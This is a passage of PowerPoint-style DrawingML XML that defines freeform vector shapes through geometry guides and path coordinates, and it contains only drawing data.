                  <a:gd name="T34" fmla="*/ 383 w 448"/>
                  <a:gd name="T35" fmla="*/ 651 h 799"/>
                  <a:gd name="T36" fmla="*/ 383 w 448"/>
                  <a:gd name="T37" fmla="*/ 651 h 799"/>
                  <a:gd name="T38" fmla="*/ 373 w 448"/>
                  <a:gd name="T39" fmla="*/ 693 h 799"/>
                  <a:gd name="T40" fmla="*/ 357 w 448"/>
                  <a:gd name="T41" fmla="*/ 725 h 799"/>
                  <a:gd name="T42" fmla="*/ 357 w 448"/>
                  <a:gd name="T43" fmla="*/ 725 h 799"/>
                  <a:gd name="T44" fmla="*/ 331 w 448"/>
                  <a:gd name="T45" fmla="*/ 751 h 799"/>
                  <a:gd name="T46" fmla="*/ 305 w 448"/>
                  <a:gd name="T47" fmla="*/ 767 h 799"/>
                  <a:gd name="T48" fmla="*/ 305 w 448"/>
                  <a:gd name="T49" fmla="*/ 767 h 799"/>
                  <a:gd name="T50" fmla="*/ 268 w 448"/>
                  <a:gd name="T51" fmla="*/ 777 h 799"/>
                  <a:gd name="T52" fmla="*/ 226 w 448"/>
                  <a:gd name="T53" fmla="*/ 788 h 799"/>
                  <a:gd name="T54" fmla="*/ 169 w 448"/>
                  <a:gd name="T55" fmla="*/ 798 h 799"/>
                  <a:gd name="T56" fmla="*/ 147 w 448"/>
                  <a:gd name="T57" fmla="*/ 693 h 799"/>
                  <a:gd name="T58" fmla="*/ 147 w 448"/>
                  <a:gd name="T59" fmla="*/ 693 h 799"/>
                  <a:gd name="T60" fmla="*/ 189 w 448"/>
                  <a:gd name="T61" fmla="*/ 688 h 7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48" h="799">
                    <a:moveTo>
                      <a:pt x="189" y="688"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="189" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="725"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="725"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="767"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="767"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="777"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="788"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="798"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="688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388" name="Group 387"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4685192" y="2136111"/>
            <a:ext cx="1709165" cy="1753015"/>
            <a:chOff x="4682017" y="2132936"/>
            <a:chExt cx="1709165" cy="1753015"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="389" name="Freeform 2"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4682017" y="2132936"/>
              <a:ext cx="1467981" cy="1753015"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 819 w 6201"/>
                <a:gd name="T1" fmla="*/ 5428 h 7403"/>
                <a:gd name="T2" fmla="*/ 1821 w 6201"/>
                <a:gd name="T3" fmla="*/ 6306 h 7403"/>
                <a:gd name="T4" fmla="*/ 6200 w 6201"/>
                <a:gd name="T5" fmla="*/ 7402 h 7403"/>
                <a:gd name="T6" fmla="*/ 5181 w 6201"/>
                <a:gd name="T7" fmla="*/ 4127 h 7403"/>
                <a:gd name="T8" fmla="*/ 2693 w 6201"/>
                <a:gd name="T9" fmla="*/ 1890 h 7403"/>
                <a:gd name="T10" fmla="*/ 3748 w 6201"/>
                <a:gd name="T11" fmla="*/ 5376 h 7403"/>
                <a:gd name="T12" fmla="*/ 3265 w 6201"/>
                <a:gd name="T13" fmla="*/ 4998 h 7403"/>
                <a:gd name="T14" fmla="*/ 3853 w 6201"/>
                <a:gd name="T15" fmla="*/ 5066 h 7403"/>
                <a:gd name="T16" fmla="*/ 3832 w 6201"/>
                <a:gd name="T17" fmla="*/ 5324 h 7403"/>
                <a:gd name="T18" fmla="*/ 2567 w 6201"/>
                <a:gd name="T19" fmla="*/ 4242 h 7403"/>
                <a:gd name="T20" fmla="*/ 3260 w 6201"/>
                <a:gd name="T21" fmla="*/ 4840 h 7403"/>
                <a:gd name="T22" fmla="*/ 2687 w 6201"/>
                <a:gd name="T23" fmla="*/ 5287 h 7403"/>
                <a:gd name="T24" fmla="*/ 2430 w 6201"/>
                <a:gd name="T25" fmla="*/ 5161 h 7403"/>
                <a:gd name="T26" fmla="*/ 2052 w 6201"/>
                <a:gd name="T27" fmla="*/ 4872 h 7403"/>
                <a:gd name="T28" fmla="*/ 3202 w 6201"/>
                <a:gd name="T29" fmla="*/ 3764 h 7403"/>
                <a:gd name="T30" fmla="*/ 3779 w 6201"/>
                <a:gd name="T31" fmla="*/ 4956 h 7403"/>
                <a:gd name="T32" fmla="*/ 3328 w 6201"/>
                <a:gd name="T33" fmla="*/ 4237 h 7403"/>
                <a:gd name="T34" fmla="*/ 3638 w 6201"/>
                <a:gd name="T35" fmla="*/ 4163 h 7403"/>
                <a:gd name="T36" fmla="*/ 3816 w 6201"/>
                <a:gd name="T37" fmla="*/ 4835 h 7403"/>
                <a:gd name="T38" fmla="*/ 2976 w 6201"/>
                <a:gd name="T39" fmla="*/ 4137 h 7403"/>
                <a:gd name="T40" fmla="*/ 3281 w 6201"/>
                <a:gd name="T41" fmla="*/ 4315 h 7403"/>
                <a:gd name="T42" fmla="*/ 2750 w 6201"/>
                <a:gd name="T43" fmla="*/ 4310 h 7403"/>
                <a:gd name="T44" fmla="*/ 2992 w 6201"/>
                <a:gd name="T45" fmla="*/ 3985 h 7403"/>
                <a:gd name="T46" fmla="*/ 2625 w 6201"/>
                <a:gd name="T47" fmla="*/ 4111 h 7403"/>
                <a:gd name="T48" fmla="*/ 3160 w 6201"/>
                <a:gd name="T49" fmla="*/ 3785 h 7403"/>
                <a:gd name="T50" fmla="*/ 3958 w 6201"/>
                <a:gd name="T51" fmla="*/ 5334 h 7403"/>
                <a:gd name="T52" fmla="*/ 4032 w 6201"/>
                <a:gd name="T53" fmla="*/ 5056 h 7403"/>
                <a:gd name="T54" fmla="*/ 4121 w 6201"/>
                <a:gd name="T55" fmla="*/ 4919 h 7403"/>
                <a:gd name="T56" fmla="*/ 3932 w 6201"/>
                <a:gd name="T57" fmla="*/ 4620 h 7403"/>
                <a:gd name="T58" fmla="*/ 4131 w 6201"/>
                <a:gd name="T59" fmla="*/ 4305 h 7403"/>
                <a:gd name="T60" fmla="*/ 3611 w 6201"/>
                <a:gd name="T61" fmla="*/ 3885 h 7403"/>
                <a:gd name="T62" fmla="*/ 3433 w 6201"/>
                <a:gd name="T63" fmla="*/ 3627 h 7403"/>
                <a:gd name="T64" fmla="*/ 3559 w 6201"/>
                <a:gd name="T65" fmla="*/ 3276 h 7403"/>
                <a:gd name="T66" fmla="*/ 3334 w 6201"/>
                <a:gd name="T67" fmla="*/ 3549 h 7403"/>
                <a:gd name="T68" fmla="*/ 2629 w 6201"/>
                <a:gd name="T69" fmla="*/ 3082 h 7403"/>
                <a:gd name="T70" fmla="*/ 2856 w 6201"/>
                <a:gd name="T71" fmla="*/ 3244 h 7403"/>
                <a:gd name="T72" fmla="*/ 3123 w 6201"/>
                <a:gd name="T73" fmla="*/ 3597 h 7403"/>
                <a:gd name="T74" fmla="*/ 2897 w 6201"/>
                <a:gd name="T75" fmla="*/ 3859 h 7403"/>
                <a:gd name="T76" fmla="*/ 2399 w 6201"/>
                <a:gd name="T77" fmla="*/ 3607 h 7403"/>
                <a:gd name="T78" fmla="*/ 2367 w 6201"/>
                <a:gd name="T79" fmla="*/ 3617 h 7403"/>
                <a:gd name="T80" fmla="*/ 2052 w 6201"/>
                <a:gd name="T81" fmla="*/ 4090 h 7403"/>
                <a:gd name="T82" fmla="*/ 1952 w 6201"/>
                <a:gd name="T83" fmla="*/ 4127 h 7403"/>
                <a:gd name="T84" fmla="*/ 2556 w 6201"/>
                <a:gd name="T85" fmla="*/ 4148 h 7403"/>
                <a:gd name="T86" fmla="*/ 1958 w 6201"/>
                <a:gd name="T87" fmla="*/ 4862 h 7403"/>
                <a:gd name="T88" fmla="*/ 1480 w 6201"/>
                <a:gd name="T89" fmla="*/ 4499 h 7403"/>
                <a:gd name="T90" fmla="*/ 1858 w 6201"/>
                <a:gd name="T91" fmla="*/ 5040 h 7403"/>
                <a:gd name="T92" fmla="*/ 1984 w 6201"/>
                <a:gd name="T93" fmla="*/ 5140 h 7403"/>
                <a:gd name="T94" fmla="*/ 2399 w 6201"/>
                <a:gd name="T95" fmla="*/ 5329 h 7403"/>
                <a:gd name="T96" fmla="*/ 2887 w 6201"/>
                <a:gd name="T97" fmla="*/ 5413 h 7403"/>
                <a:gd name="T98" fmla="*/ 2719 w 6201"/>
                <a:gd name="T99" fmla="*/ 5670 h 7403"/>
                <a:gd name="T100" fmla="*/ 2776 w 6201"/>
                <a:gd name="T101" fmla="*/ 5759 h 7403"/>
                <a:gd name="T102" fmla="*/ 3044 w 6201"/>
                <a:gd name="T103" fmla="*/ 5439 h 7403"/>
                <a:gd name="T104" fmla="*/ 3895 w 6201"/>
                <a:gd name="T105" fmla="*/ 5413 h 7403"/>
                <a:gd name="T106" fmla="*/ 3317 w 6201"/>
                <a:gd name="T107" fmla="*/ 5791 h 7403"/>
                <a:gd name="T108" fmla="*/ 2488 w 6201"/>
                <a:gd name="T109" fmla="*/ 5806 h 7403"/>
                <a:gd name="T110" fmla="*/ 1721 w 6201"/>
                <a:gd name="T111" fmla="*/ 5245 h 7403"/>
                <a:gd name="T112" fmla="*/ 1480 w 6201"/>
                <a:gd name="T113" fmla="*/ 4499 h 7403"/>
                <a:gd name="T114" fmla="*/ 1669 w 6201"/>
                <a:gd name="T115" fmla="*/ 3759 h 7403"/>
                <a:gd name="T116" fmla="*/ 2446 w 6201"/>
                <a:gd name="T117" fmla="*/ 3129 h 7403"/>
                <a:gd name="T118" fmla="*/ 3317 w 6201"/>
                <a:gd name="T119" fmla="*/ 3129 h 7403"/>
                <a:gd name="T120" fmla="*/ 4126 w 6201"/>
                <a:gd name="T121" fmla="*/ 3817 h 7403"/>
                <a:gd name="T122" fmla="*/ 4278 w 6201"/>
                <a:gd name="T123" fmla="*/ 4468 h 7403"/>
                <a:gd name="T124" fmla="*/ 1611 w 6201"/>
                <a:gd name="T125" fmla="*/ 4032 h 7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201" h="7403">
                  <a:moveTo>
                    <a:pt x="1202" y="1355"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1202" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="5224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="5240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320" y="5261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525" y="5313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629" y="5350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819" y="5428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="913" y="5476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1008" y="5528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1096" y="5581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181" y="5638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265" y="5701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1343" y="5765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1422" y="5833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1496" y="5906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1569" y="5980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1637" y="6059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1701" y="6137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764" y="6221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821" y="6306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1874" y="6394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="6489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1974" y="6583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015" y="6678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052" y="6773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089" y="6877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2121" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141" y="7082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162" y="7187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178" y="7292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2194" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6200" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6200" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6184" y="7124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6158" y="6851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6121" y="6583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6073" y="6316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6016" y="6053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5943" y="5796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5864" y="5544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5775" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5675" y="5050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5565" y="4809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5444" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5318" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5181" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5034" y="3911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4877" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4714" y="3502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4546" y="3302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4367" y="3113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4184" y="2935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989" y="2762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3790" y="2594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3580" y="2436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3370" y="2289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3150" y="2147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923" y="2011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2693" y="1890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2456" y="1774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2215" y="1670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968" y="1575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716" y="1491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1459" y="1417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202" y="1355"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="598" y="903"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="199" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598" y="903"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3832" y="5355"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3832" y="5355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3748" y="5376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3658" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3570" y="5397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3475" y="5402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381" y="5402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286" y="5397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="5376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="5376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3155" y="5255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187" y="5192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3217" y="5129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3265" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302" y="4862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302" y="4862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3364" y="4893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="4924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3491" y="4946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="4967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3611" y="4982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3675" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3738" y="5003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3795" y="5009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3795" y="5009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3822" y="5040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3853" y="5066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3890" y="5082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3932" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3937" y="5192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3922" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3922" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="5287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3848" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="5324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="5355"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2052" y="4872"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2052" y="4872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2099" y="4767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2147" y="4667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2268" y="4494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2336" y="4421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="4295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2567" y="4242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2567" y="4242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593" y="4263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2603" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772" y="4436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2845" y="4515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923" y="4589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3003" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="4725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3170" y="4788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260" y="4840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260" y="4840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3244" y="4909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3228" y="4977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3207" y="5045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3181" y="5108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3150" y="5177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3118" y="5240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3081" y="5308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2808" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="5287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2567" y="5229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2562" y="5213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2551" y="5197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2540" y="5182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2525" y="5171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2504" y="5161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="5156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="5156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="5156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="5156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2430" y="5161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="5171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="5182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="5182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2257" y="5119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126" y="5050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126" y="5050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2131" y="5024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2136" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2136" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126" y="4961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2110" y="4924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2084" y="4893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052" y="4872"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3459" y="3817"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3459" y="3817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3528" y="3917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="4016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="4016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3517" y="4001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3438" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3360" y="3979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="3979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="3979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3244" y="3869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3202" y="3764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3202" y="3764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3354" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3370" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407" y="3748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407" y="3754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407" y="3754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3412" y="3774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423" y="3796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3438" y="3811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3459" y="3817"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3779" y="4956"/>
                  </a:moveTo>
